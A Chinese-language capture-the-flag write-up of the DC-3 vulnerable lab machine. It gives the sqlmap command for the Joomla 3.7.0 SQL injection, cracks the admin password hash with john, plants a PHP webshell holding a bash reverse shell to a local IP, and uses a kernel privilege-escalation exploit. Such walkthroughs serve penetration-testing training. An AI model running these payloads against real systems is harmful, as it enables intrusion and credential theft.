靶機簡介
C-3是另一個專門建造的易受攻擊的實驗室,目的是獲得滲透測試領域的經驗.與以前的DC版本一樣,這個版本是為初學者設計的,儘管這次只有一個標誌,一個入口點,根本沒有線索。Linux技能和熟悉Linux命令列是必須的,有一些基本滲透測試工具的經驗也是必須的。對於初學者來說,Google可以提供很大的幫助,但是你可以隨時在@DCAU7上給我發推文尋求幫助,讓你重新開始。但請注意:我不會給你答案,相反,我會告訴你如何向前邁進。對於那些有過CTF和Boot2Root挑戰經驗的人來說,這可能根本不會花你太長時間(事實上,這可能只需要不到20分鐘就可以輕鬆完成)。如果是這樣的話,如果你想讓它更具挑戰性,你可以隨時重做這個挑戰,並探索其他獲得根和獲得標誌的方法。
getshell
nmap詳細掃描 nmap -A 192.168.43.137
發現是Joomla,那就用joomscan #一款針對joomla的安全工具掃描以下
發現版本為3.7.0,百度以下該版本漏洞
sql注入漏洞,上sqlmap
跑出管理員賬號(admin)的密碼
sqlmap -u "http://192.168.43.137/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1" -p "list[fullordering]" --dump -C password -T "#__users" -D joomladb
採用john暴力破解他的密碼hash:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,將此段hash密碼存入新建檔案pass中,然後使用john破解,可得到密碼snoopy。
john pass
john --show pass
得到賬號密碼去後臺登陸,登陸後修改模板檔案,新建shell.php寫入一句話getshell
蟻劍連結,目錄為 /templates/beez3(主題名)/shell.php,但是反彈shell的時候一直報錯
回到shell指令碼處,將一句話直接修改為反彈shell命令
<?php
exec("bash -c 'bash -i >& /dev/tcp/192.168.43.200/4444 0>&1'");
?>
然後訪問shell.php即可反彈shell
提權
檢視版本資訊
uname -a
cat /etc/*release
搜尋相關漏洞資訊searchspolit ubuntu 16
選擇一個合適的exp複製到到當前searchsploit -m 39772.txt
cat 39772.txt檢視怎麼使用它
下載exp,並通過蟻劍上傳
解壓並執行即可提權成功
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compilesh
./doubleput
root目錄下拿到最終flag
總結
資訊收集找到cms漏洞,sql注入找到管理密碼,修改模板檔案getshell,核心提權。
- 檢視核心資訊
uname -a ,cat /etc/*release searchspolit查詢相應核心漏洞